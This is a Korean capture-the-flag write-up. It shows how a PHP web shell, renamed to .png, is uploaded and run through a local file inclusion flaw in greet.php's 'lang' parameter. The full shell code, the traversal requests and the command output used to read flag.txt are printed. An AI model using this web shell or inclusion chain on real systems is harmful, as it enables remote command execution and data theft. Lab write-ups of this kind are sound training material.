[SegFault] (File Vuln) - Web Shell 3

[SegFault] (File Vuln)

Web Shell 3

서버에서 중요 파일! flag 파일을 가져와라!

문제 파악

본 문제는 File Vulnerability에 관한 문제로서, 'Server Side Script' File, 즉 웹 쉘(Web Shell)을 Upload 하고, 해당 웹 쉘의 업로드 위치를 찾아 실행 시켜 flag.txt 파일을 찾는 문제이다.

 

Vuln Point

본 문제의 경우, 게시판의 글쓰기 기능에서 .php파일이 업로드되지 않는다.

하지만 File Inclusion 취약점이 존재한다. 

로그인 후 확인해보면 인사말이라는 페이지가 존재하는 것을 확인할 수 있다.

해당 페이지에 접근해보면 다음과 같이 여러 국가의 언어로 번역되는 페이지가 존재한다.

이것의 주소를 살펴보면 다음과 같다.

http://ctf.segfaulthub.com:9023/webshell_3/webshell_3/greet.php

언어를 변경하기위해 누르는 경우 다음과 같이 변경된다.

이 경우 greet.php의 lang 파라미터가 변경되면서 페이지가 변경되는 것을 확인할 수 있다. 이것은 File을 Include를 이용하여 불러오고 있는 것임을 알 수 있다.

http://ctf.segfaulthub.com:9023/webshell_3/webshell_3/greet.php?lang=en.php

http://ctf.segfaulthub.com:9023/webshell_3/webshell_3/greet.php?lang=ko.php

위와 같이 해당 페이지에서 파라미터를 통해, 번역 부분만을 따로이 불러오는 것이다.

해당 디렉터리를 디렉터리 인덱싱 취약점을 통해 확인해보면 다음과 같다.

---

풀이 과정 (해결 방안)

사용한 웹 쉘 코드

사용하기 편하도록 수정한 웹 쉘 코드이다.

<?php
    echo 'Enter a Command:<br>';
    echo '<form action="" method="get">';
    echo '<input type="text" name="cmd">';
    echo '<input type="submit">';
    echo '</form>';
    
    if(isset($_GET['cmd'])){
        system($_GET['cmd']);
    }
?>

 

웹 쉘 업로드

게시판의 업로드 기능에서 확장자 검증이 이루어지고 있어서 (.php)파일의 업로드는 불가능하다.

하지만 본 문제의 경우 File Include 취약점이 존재하기 때문에 다른 확장자로 올린 파일에도 Server Side Script 코드가 들어 있다면 그대로 복사 붙여넣기 하기 때문에 실행이 가능하도록 한다.

그러므로 web_shell.php 파일을 web_shell.png로 변경한 후 업로드 한다.

업로드 후 다운로드 링크를 확인해보면 다음과 같다.

http://ctf.segfaulthub.com:9023/webshell_3/webshell_3/files/gear/web_shell.png

 

웹 쉘 실행

인사말 페이지에 접속하여 Burp를 이용하여 파라미터 변경을 수행한다.

GET /webshell_3/webshell_3/greet.php?lang=

lang 파라미터에 삽입되는 파일에 대하여 include를 이용하는 것을 확인하였기 때문에 해당 파라미터에서 위의 경로의 web_shell.png를 넣어준다면 내용을 그대로 복사하여 가져오기 때문에 실행이 가능하다.

 

flag 찾기

GET /webshell_3/webshell_3/greet.php?lang=../files/gear/web_shell.png&cmd=dir

위와 같이 입력하며 다음과 같이 상위 디렉터리에 존재하는 모든 파일들을 확인할 수 있다.

address.php likes.php notice_update.php qna_create.php css login notice_update_process.php qna_delete.php download.php login.php notice_write.php qna.php file_delete.php mypage.php notice_write_process.php qna_read.php files mypage_update.php qna_answer.php signup.html greet.php notice_delete.php qna_board.php signup.php index.php notice_list.php qna_check.php topSecret lang notice_read.php qna_comment.php

확인해 본 결과 topSecret이라는 디렉터리가 존재하는 것을 확인할 수 있다.

GET /webshell_3/webshell_3/greet.php?lang=../files/gear/web_shell.png&cmd=dir+topSecret

위와 같이 입력하여 topSecret 디렉터리 내부를 확인해본 결과 flag.txt파일이 존재하는 것을 확인할 수 있었다.

내용을 확인하기 위해 cat 명령어를 이용한다.

GET /webshell_3/webshell_3/greet.php?lang=../files/gear/web_shell.png&cmd=cat+topSecret/flag.txt

위와 같이 입력한 결과 flag를 획득할 수 있었다.

---

생각해 볼 점

File Include 취약점이 존재한다면, 구지 해당 Server Side의 확장자가 아니더라도 업로드 하여 Include 한다면 Server Side Script를 이용할 수 있다는 것을 인지하자!

---

질문 환영, 수정 및 보완에 대한 지적 환영